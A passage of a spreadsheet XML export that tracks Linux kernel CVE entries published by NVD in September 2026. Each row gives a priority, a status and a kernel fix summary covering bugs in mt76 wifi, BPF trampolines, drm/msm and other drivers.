mt7996_mac_reset_vif_iter() queues non-default vif links for kfree_rcu
while dev-&gt;wcid[] still holds pointers to the wcid embedded in each
freed link; mt76_reset_device() then dereferences those entries and
runs mt76_wcid_cleanup() on them. If a grace period elapses in between,
the cleanup operates on freed memory.
Run mt76_reset_device() first, so the wcid entries are cleaned up and
cleared while the links are still valid.</t>
        </is>
      </c>
      <c r="T724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90356</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90357</t>
        </is>
      </c>
      <c r="D725" s="5" t="inlineStr"/>
      <c r="E725" s="5" t="inlineStr"/>
      <c r="F725" s="5" t="inlineStr"/>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="inlineStr"/>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr"/>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q725" s="5" t="inlineStr"/>
      <c r="R725" s="5" t="inlineStr"/>
      <c r="S725" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: unlink TWT flow if the MCU rejects the agreement
The flow is added to dev-&gt;twt_list before sending the agreement to the
firmware, but the error path leaves it linked while flowid_mask is
never set. The flow slot can then be reused and memset while still on
the list, corrupting twt_list, and station removal leaves a dangling
entry behind that mt7915_mac_twt_sched_list_add() later walks.</t>
        </is>
      </c>
      <c r="T725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90357</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90358</t>
        </is>
      </c>
      <c r="D726" s="5" t="inlineStr"/>
      <c r="E726" s="5" t="inlineStr"/>
      <c r="F726" s="5" t="inlineStr"/>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="inlineStr"/>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr"/>
      <c r="L726" s="5" t="inlineStr"/>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q726" s="5" t="inlineStr"/>
      <c r="R726" s="5" t="inlineStr"/>
      <c r="S726" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, x86: Fix trampoline stack size for 128-bit arguments
btf_distill_func_proto() accepts a function argument up to 16 bytes, so a
128-bit scalar such as __int128 reaches the x86 trampoline with
arg_size == 16. But the current implementation assumes an __int128
argument only needs one register, so the register save area is
under-allocated and save_args() overwrites adjacent stack slots.
Compute the register count from arg_size for all arguments to fix it.</t>
        </is>
      </c>
      <c r="T726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90358</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90359</t>
        </is>
      </c>
      <c r="D727" s="5" t="inlineStr"/>
      <c r="E727" s="5" t="inlineStr"/>
      <c r="F727" s="5" t="inlineStr"/>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="inlineStr"/>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr"/>
      <c r="L727" s="5" t="inlineStr"/>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q727" s="5" t="inlineStr"/>
      <c r="R727" s="5" t="inlineStr"/>
      <c r="S727" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject &gt;8 byte return values on return-reading trampoline paths
btf_distill_func_proto() builds the function model used for the
fentry/fexit/fmod_ret/fsession trampolines and struct_ops. It has
accepted a 16-byte __int128 return value since the trampoline was
introduced: __get_type_size() returns the integer's type size, and the
return-type check only rejected ret &lt; 0.
But the BPF trampoline preserves only 8 bytes of the return value (RAX on
x86, i.e. R0). For an attach type that reads the target's return value the
second half (RDX / R3) is neither saved nor restored, so a program
attached to a function returning a 16-byte value corrupts the value seen
by the real caller and itself observes only half of it. struct_ops
trampolines have the same limitation.
This affects the attach types that read the target's return value: fexit,
fmod_ret and fsession (plus the _multi variants of fexit and fsession),
and struct_ops. fentry/fentry_multi run before the target returns and are
unaffected.
Reject a &gt;8 byte return value for these attach types in
bpf_check_attach_target() and bpf_check_attach_btf_id_multi(), and for
struct_ops in bpf_struct_ops_desc_init().</t>
        </is>
      </c>
      <c r="T727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90359</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90360</t>
        </is>
      </c>
      <c r="D728" s="5" t="inlineStr"/>
      <c r="E728" s="5" t="inlineStr"/>
      <c r="F728" s="5" t="inlineStr"/>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="inlineStr"/>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr"/>
      <c r="L728" s="5" t="inlineStr"/>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q728" s="5" t="inlineStr"/>
      <c r="R728" s="5" t="inlineStr"/>
      <c r="S728" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
regulator: core: use system_freezable_wq for init complete work
schedule_delayed_work() uses system_wq, which is non-freezable, allowing
regulator_init_complete_work to run concurrently with system suspend. This
work fires ~30s after boot to disable unused regulators via I2C. When it
races with PM suspend, the I2C adapter may already be suspended, triggering
a -ESHUTDOWN warning in __i2c_transfer():
  WARNING: ... at __i2c_transfer+0x36c/0x3c8
  Call trace:
   __i2c_transfer
   i2c_transfer
   regmap_i2c_write
   _regmap_update_bits
   regulator_disable_regmap
   _regulator_do_disable
   regulator_late_cleanup
   regulator_init_complete_work_function
   process_one_work
Switch to system_freezable_wq so the work is frozen before any device
is suspended, eliminating the race.</t>
        </is>
      </c>
      <c r="T728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90360</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90361</t>
        </is>
      </c>
      <c r="D729" s="5" t="inlineStr"/>
      <c r="E729" s="5" t="inlineStr"/>
      <c r="F729" s="5" t="inlineStr"/>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="inlineStr"/>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr"/>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q729" s="5" t="inlineStr"/>
      <c r="R729" s="5" t="inlineStr"/>
      <c r="S729" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath11k: fix leak in ath11k_service_ready_ext_event()
Currently, during ath11k_service_ready_ext_event() processing,
svc_rdy_ext.mac_phy_caps can be allocated during TLV parsing. This is a
temporary allocation that is freed on the success path, but not on the
error path. If parsing succeeds far enough to allocate mac_phy_caps and
then fails on a later TLV, the allocation leaks. So free the allocation
on the error path.
Compile tested only.</t>
        </is>
      </c>
      <c r="T729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90361</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90362</t>
        </is>
      </c>
      <c r="D730" s="5" t="inlineStr"/>
      <c r="E730" s="5" t="inlineStr"/>
      <c r="F730" s="5" t="inlineStr"/>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="inlineStr"/>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr"/>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q730" s="5" t="inlineStr"/>
      <c r="R730" s="5" t="inlineStr"/>
      <c r="S730" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm/dsi: Drop dev_pm_opp_set_rate(0)
dev_pm_opp_set_rate(0) removes the vote specified in required-opps but
does not actually park the clock, making it run without the necessary
power backing. Drop the explicit call to it.
Every call site of ops-&gt;link_clk_disable() is followed by
pm_runtime_put(), so the power vote will be rescinded if deemed safe.
Patchwork: https://patchwork.freedesktop.org/patch/742783/</t>
        </is>
      </c>
      <c r="T730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90362</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90363</t>
        </is>
      </c>
      <c r="D731" s="5" t="inlineStr"/>
      <c r="E731" s="5" t="inlineStr"/>
      <c r="F731" s="5" t="inlineStr"/>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="inlineStr"/>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr"/>
      <c r="K731" s="5" t="inlineStr"/>
      <c r="L731" s="5" t="inlineStr"/>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q731" s="5" t="inlineStr"/>
      <c r="R731" s="5" t="inlineStr"/>
      <c r="S731" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm: don't tear down KMS twice when KMS init fails
When priv-&gt;kms_init() (mdp4_kms_init() / mdp5_kms_init()) fails partway
through, both display drivers already tear their KMS state down via
mdp4_destroy() / mdp5_kms_destroy() before returning the error. The
common error path in msm_drm_init() then runs msm_drm_uninit() -&gt;
msm_drm_kms_uninit(), which tries to destroy the very same KMS a second
time, which causes a use-after-free crash.
Bring MDP4/MDP5 in line with the DPU driver whose dpu_kms_init() doesn't
perform error cleanup on the failure. Let the common path own the
cleanup, instead of freeing the KMS from their error paths.
The crash trace for the reference:
  __lock_acquire from lock_acquire (kernel/locking/lockdep.c:5906 kernel/locking/lockdep.c:5863)
  lock_acquire from touch_wq_lockdep_map (kernel/workqueue.c:4094 (discriminator 1))
  touch_wq_lockdep_map from __flush_workqueue (kernel/workqueue.c:4136)
  __flush_workqueue from msm_drm_kms_uninit (drivers/gpu/drm/msm/msm_kms.c:243 (discriminator 33))
  msm_drm_kms_uninit from msm_drm_uninit (drivers/gpu/drm/msm/msm_drv.c:93)
  msm_drm_uninit from msm_drm_init (drivers/gpu/drm/msm/msm_drv.c:184)
  msm_drm_init from try_to_bring_up_aggregate_device (drivers/base/component.c:249 drivers/base/component.c:227)
  try_to_bring_up_aggregate_device from __component_add (drivers/base/component.c:269 drivers/base/component.c:748)
  __component_add from dsi_host_attach (drivers/gpu/drm/msm/dsi/dsi_host.c:1739)
  dsi_host_attach from mipi_dsi_attach (drivers/gpu/drm/drm_mipi_dsi.c:383)
  mipi_dsi_attach from sharp_nt_panel_probe (drivers/gpu/drm/panel/panel-sharp-ls043t1le01.c:247)
Patchwork: https://patchwork.freedesktop.org/patch/742068/</t>
        </is>
      </c>
      <c r="T731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90363</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90364</t>
        </is>
      </c>
      <c r="D732" s="5" t="inlineStr"/>
      <c r="E732" s="5" t="inlineStr"/>
      <c r="F732" s="5" t="inlineStr"/>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="inlineStr"/>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr"/>
      <c r="K732" s="5" t="inlineStr"/>
      <c r="L732" s="5" t="inlineStr"/>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q732" s="5" t="inlineStr"/>
      <c r="R732" s="5" t="inlineStr"/>
      <c r="S732" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: processor: Unregister cpufreq notifier on init failure
acpi_processor_driver_init() registers the cpufreq policy notifier before
registering the ACPI processor driver and setting up CPU hotplug state.
If driver_register() or cpuhp_setup_state() fails, the error path only
unregisters the ACPI processor driver and the idle driver. The cpufreq
notifier remains registered even though initialization failed.
Mirror the module exit path on the init failure path and unregister the
cpufreq notifier when it has been registered.</t>
        </is>
      </c>
      <c r="T732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90364</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90365</t>
        </is>
      </c>
      <c r="D733" s="5" t="inlineStr"/>
      <c r="E733" s="5" t="inlineStr"/>
      <c r="F733" s="5" t="inlineStr"/>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="inlineStr"/>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr"/>
      <c r="L733" s="5" t="inlineStr"/>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q733" s="5" t="inlineStr"/>
      <c r="R733" s="5" t="inlineStr"/>
      <c r="S733" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: cancel reset and rc work on device unregister
Both drivers cancelled dump_work on unregister but left reset_work and
rc_work to be flushed only by destroy_workqueue() in mt76_free_device(),
which runs after the hw is unregistered and the hardware stopped. A
reset_work that fires in that window calls ieee80211_restart_hw() and
re-arms mac_work on an unregistered hw, and rc_work touches station state
being torn down. Cancel both up front, alongside dump_work.</t>
        </is>
      </c>
      <c r="T733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90365</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90366</t>
        </is>
      </c>
      <c r="D734" s="5" t="inlineStr"/>
      <c r="E734" s="5" t="inlineStr"/>
      <c r="F734" s="5" t="inlineStr"/>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="inlineStr"/>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr"/>
      <c r="L734" s="5" t="inlineStr"/>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q734" s="5" t="inlineStr"/>
      <c r="R734" s="5" t="inlineStr"/>
      <c r="S734" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: reserve space for the CSA-abort countdown TLV
When a CSA countdown is active, mt7996_mcu_beacon_cntdwn() emits two
bss_bcn_cntdwn_tlv entries (the CSA countdown and the CCA-abort BCC), but
MT7996_BEACON_UPDATE_SIZE only reserved one. With MBSSID enabled and a
near-maximum beacon template the extra 8 bytes could push the offload
command past MT7996_MAX_BSS_OFFLOAD_SIZE and trigger skb_over_panic().
Reserve room for both countdown TLVs.</t>
        </is>
      </c>
      <c r="T734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90366</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90367</t>
        </is>
      </c>
      <c r="D735" s="5" t="inlineStr"/>
      <c r="E735" s="5" t="inlineStr"/>
      <c r="F735" s="5" t="inlineStr"/>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="inlineStr"/>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr"/>
      <c r="L735" s="5" t="inlineStr"/>
      <c r="M735" s="5" t="inlineStr"/>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q735" s="5" t="inlineStr"/>
      <c r="R735" s="5" t="inlineStr"/>
      <c r="S735" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: hold dev-&gt;mt76.mutex while disabling tx worker in SER
mt7996_mac_reset_work() parked the tx worker and disabled the RX/TX NAPIs
before taking dev-&gt;mt76.mutex. mt76_worker_disable()/_enable() are plain
kthread park/unpark, not refcounted, and __mt76_set_channel() toggles the
same worker and the MT76_RESET bit under the mutex. An L1 SER racing a
channel switch could therefore have the worker unparked and MT76_RESET
cleared while the reset path resets the DMA rings, corrupting descriptors
or tokens. Take the mutex before disabling the worker, as mt7915 does.</t>
        </is>
      </c>
      <c r="T735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90367</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90368</t>
        </is>
      </c>
      <c r="D736" s="5" t="inlineStr"/>
      <c r="E736" s="5" t="inlineStr"/>
      <c r="F736" s="5" t="inlineStr"/>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="inlineStr"/>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr"/>
      <c r="L736" s="5" t="inlineStr"/>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q736" s="5" t="inlineStr"/>
      <c r="R736" s="5" t="inlineStr"/>
      <c r="S736" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: unwind state on add_interface failure
When mt76_wcid_alloc() fails, mt7915_add_interface() returned without
clearing the vif_mask/omac_mask bits it had already set, without removing
the firmware dev info added earlier, and without clearing a monitor_vif
pointer to the vif mac80211 is about to free. mac80211 does not call
remove_interface() for a failed add, so the indices and firmware dev
entry leaked permanently and testmode could dereference the stale
monitor_vif. Add a proper error unwind.</t>
        </is>
      </c>
      <c r="T736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90368</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90369</t>
        </is>
      </c>
      <c r="D737" s="5" t="inlineStr"/>
      <c r="E737" s="5" t="inlineStr"/>
      <c r="F737" s="5" t="inlineStr"/>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="inlineStr"/>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr"/>
      <c r="L737" s="5" t="inlineStr"/>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q737" s="5" t="inlineStr"/>
      <c r="R737" s="5" t="inlineStr"/>
      <c r="S737" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: fix out-of-bounds access in mmio copy helpers
mt76_mmio_write_copy() and mt76_mmio_read_copy() iterate up to
ALIGN(len, 4), so a length that is not a multiple of four reads past the
source buffer (write_copy) or writes past the destination (read_copy).
Copy the aligned body in the loop and handle the remaining tail through a
4-byte bounce buffer, keeping the register access width unchanged.</t>
        </is>
      </c>
      <c r="T737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90369</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90370</t>
        </is>
      </c>
      <c r="D738" s="5" t="inlineStr"/>
      <c r="E738" s="5" t="inlineStr"/>
      <c r="F738" s="5" t="inlineStr"/>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="inlineStr"/>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr"/>
      <c r="L738" s="5" t="inlineStr"/>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q738" s="5" t="inlineStr"/>
      <c r="R738" s="5" t="inlineStr"/>
      <c r="S738" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: bound TLV walk in mt7996_mcu_get_chip_config
The response TLV loop advanced by tlv-&gt;len without a minimum, so a
theoretical firmware response containing a zero-length TLV could spin
forever, hanging the CPU during device probe.
The u32 payload was also read without bounds checking.
Reject a short fixed field, stop on a TLV whose length underruns the
header or overruns the skb.</t>
        </is>
      </c>
      <c r="T738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90370</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90371</t>
        </is>
      </c>
      <c r="D739" s="5" t="inlineStr"/>
      <c r="E739" s="5" t="inlineStr"/>
      <c r="F739" s="5" t="inlineStr"/>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="inlineStr"/>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr"/>
      <c r="L739" s="5" t="inlineStr"/>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q739" s="5" t="inlineStr"/>
      <c r="R739" s="5" t="inlineStr"/>
      <c r="S739" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: fix RXDMAD_C buffer recycling race
The RXDMAD_C buffers come from the RRO data queues' page pools, which are
bound to a different NAPI, so the direct page-pool recycle used here could
race the owning NAPI; take the non-direct path as is already done for WED
RX queues.</t>
        </is>
      </c>
      <c r="T739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90371</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
